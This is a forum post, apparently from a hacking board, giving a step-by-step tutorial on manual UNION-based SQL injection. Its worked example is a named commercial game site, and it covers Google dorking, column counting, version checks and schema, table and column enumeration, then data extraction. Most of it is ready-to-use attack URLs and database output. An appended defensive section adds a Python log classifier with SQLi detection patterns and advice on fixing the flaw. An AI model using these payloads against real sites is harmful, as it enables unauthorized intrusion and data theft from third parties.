SQLi/Dork MANUALLY INJECTING SQL/i

NoneKnowofMI6

We will therefore divide this into several chapters.
/Chapter 1:Finding a sql flaw
For the moment, nothing could be simpler: you will have to search Google for lists of dorks for SQL injection (preferably a recent list).
This list is going to help us sort out what kind of site we're going to need. So I took:
Code:
category_list.php? id=

Please note that for a sql injection a site will always have to end this way:
Code:
id=alltransferable numbers

So I come across this url:
Code:
www.interplay.com/games/support.php? id=42

To check if the page is vulnerable, add a quote at the end of your url:
Code:
www.interplay.com/games/support.php? id=42'

I get the following error message:

1064: Vous avez une erreur dans votre SQL syntax; Check the manual that corresponds to your MySQL server version for the right syntax to use near ' ' ORDER BY release_date DESC' at line 1

The site is therefore very vulnerable.

/Chapter 2:Finding the Column Number in the DB

Now that we have found a flaw, we will have to find the number of columns in the DB.

I will remove the quotation mark and add the following code
Code:
order by 1--
The site loads normally, and I will keep entering the code, changing the number each time, until I get an error:
http://www.interplay.com/games/support.php?id=42 order by 1-- /No error
http://www.interplay.com/games/support.php?id=42 order by 2-- /No error
http://www.interplay.com/games/support.php?id=42 order by 3-- /No error
http://www.interplay.com/games/support.php?id=42 order by 4-- /No error
http://www.interplay.com/games/support.php?id=42 order by 5-- /No error
http://www.interplay.com/games/support.php?id=42 order by 6-- /No error
http://www.interplay.com/games/support.php?id=42 order by 7-- /No error
http://www.interplay.com/games/support.php?id=42 order by 8-- /No error
http://www.interplay.com/games/support.php?id=42 order by 9-- /No error
http://www.interplay.com/games/support.php?id=42 order by 11-- /No error
http://www.interplay.com/games/support.php?id=42 order by 12-- /No error
http://www.interplay.com/games/support.php?id=42 order by 13-- /No error
http://www.interplay.com/games/support.php?id=42 order by 14-- /No error
http://www.interplay.com/games/support.php?id=42 order by 15-- /No error
http://www.interplay.com/games/support.php?id=42 order by 16-- /No error
http://www.interplay.com/games/support.php?id=42 order by 17-- /No error
http://www.interplay.com/games/support.php?id=42 order by 18-- /No error
http://www.interplay.com/games/support.php?id=42 order by 19-- /No error
http://www.interplay.com/games/support.php?id=42 order by 20-- /ERROR

Page 20 indicates an error of this type
Code:
1054: Unknown column '20' in 'order clause'

So I take all the numbers before that, which gives us 19 columns.

/Chapter 3:Finding Accessible Columns
Now that we have determined the number of columns (19), it is necessary to determine which ones we can pull information from.

So I will delete everything after id=42 and I will add this.

Code:
id=-42 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Please note to place the - behind the number after id.


So we have chosen all the columns and if you press enter you will see some numbers including 2,17,8 and 9.
/Chapter 4:Finding the MySql version
The injection will not be possible if the MySql version is below 5.

Finding the MySQL version could not be simpler.
Replace one of the numbers that appeared on the page (so you have the choice between 2 , 17 , 8 and 9) and add the following code
Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Or this one

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

So I chose the number 2.

The version of MySql is: 5.5.38

Injection is therefore possible.

/Chapter 5:Finding the name(s) of the DB(s)
Now we will inject the site to find the name of the DB. We will replace @@version or version()

by
Code:
group_concat(schema_name)

and add between the end number and the quotes

Code:
from information_schema.schemata

Which gives
Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.schemata--

Be careful not to forget the space between the 19 and from because otherwise it will not work.

So we have 2 DB:
-information_schema
-interplay


/Chapter 6:Finding the DB we will use

This operation will list the name(s) of the DB.
To see which one we’re using, we’ll replace

Code:
group_concat(schema_name)

by

Code:
concat(database())

and delete from information_schema.schemata

The result is:

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,concat(database)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--



The site shows us only interplay.
So we use interplay DB.


/Chapter 7:Finding the Table Names

To get the names of the DB tables, we must replace

Code:
concat(database())

by

Code:
group_concat(table_name)

and add


Code:
from information_schema.tables where table_schema=database()

Between the last number and the two quotes.

Be careful not to join the from to the 19.
The result is:

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()-

All tables are then listed, each separated by a comma

Here are the tables:

banners,banners_banner_id_seq,careers,careers_career_id_seq,downloads,franchises,franchises_franchise_id_seq,news,news_news_id_seq,screenshots,screenshots_screenshot_id_seq,titles,titles_title_id_seq



Note them down, as they will be useful.

/Chapter 8:Finding the Column Names

We will proceed in the same way to find the names of the columns. That is to say that we will just change

Code:
table_name

by

Code:
column_name

and change


Code:
information_schema.tables


by

Code:
information_schema.columns


This is relatively simple.


The column names are then displayed in the same way as for the tables:

banner_id,title,release_date,expires_date,visible,imagefilename,slot_name,weight,language,link_url,width,height,id,career_id,created,visible,title,location,summary,description,language,id,download_id,filename,name,release_date,supportfile,category,franchise_id,name,visible,description,language,id,news_id,visible,display_date,expires_date,t


/Chapter 9:Getting Information
Now for the home stretch.

Replace

Code:
group_concat(column_name)

by

Code:
(Columnname,0x3a,columnname,0x3a)

and

Code:
from information_schema.columns where table_schema=database()

by

Code:
from databasename.tablename

Note: Anything in red should be replaced.

For example if I want banner_id and title columns

So I say this:

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,group_concat(banner_id,0x3a,title,0x3a),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from interplay.banners--

Normally the page will show you the information.


If the page shows you

1054: Unknown column 'banner_id' in 'field list'

It’s just that the columns are not in the right table, so you will have to look for which table banner_id is in and which table title is in.

That’s all from me. I leave you with a big kiss to all :=P (love)

Reactions: fognayerku
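
A defender-side view of the steps in the post above, as an added example that is not part of the original post: a Python classifier that tags logged request targets with the stage of the walkthrough they resemble (quote probe, ORDER BY column count, UNION SELECT, version probe, information_schema enumeration) and reports clients that progress through several stages. The log entries, client addresses, the `/support.php` and `/news.php` paths and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Stage name -> pattern, in the order the post's chapters use them.
STAGES = [
    ("quote_probe",   re.compile(r"=-?\d+\s*['\"]")),
    ("column_count",  re.compile(r"\border\s+by\s+\d+")),
    ("union_select",  re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(")),
    ("schema_enum",   re.compile(r"\binformation_schema\b")),
]

# Constructed (client, request target) pairs; not taken from any real server log.
SAMPLE_LOG = [
    ("198.51.100.20", "/support.php?id=42"),
    ("198.51.100.20", "/news.php?sort=order&by=date"),
    ("203.0.113.7", "/support.php?id=42%27"),
    ("203.0.113.7", "/support.php?id=42+order+by+20--"),
    ("203.0.113.7", "/support.php?id=-42%20UNION%20SELECT%201,@@version,3--"),
    ("203.0.113.7", "/support.php?id=-42+union+select+1,group_concat(table_name),3"
                    "+from+information_schema.tables--"),
]

def normalize(target):
    """URL-decode, lowercase and collapse whitespace so encoding and case do not hide a match."""
    return re.sub(r"\s+", " ", unquote_plus(target).lower())

def classify(target):
    """Return the names of every stage whose pattern appears in the request target."""
    text = normalize(target)
    return [name for name, pattern in STAGES if pattern.search(text)]

def summarize(log):
    """Map each client to the distinct stages seen from it, in first-seen order."""
    seen = defaultdict(list)
    for client, target in log:
        for stage in classify(target):
            if stage not in seen[client]:
                seen[client].append(stage)
    return dict(seen)

def escalating_clients(log, threshold=3):
    """Clients that touched at least `threshold` distinct stages (assumed alert cutoff)."""
    return sorted(c for c, stages in summarize(log).items() if len(stages) >= threshold)

if __name__ == "__main__":
    for client, stages in summarize(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

Log matching of this kind only surfaces probing after the fact; the flaw itself is closed by validating `id` as an integer and passing it to the database as a bound query parameter, and by not returning raw database error messages to the client.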
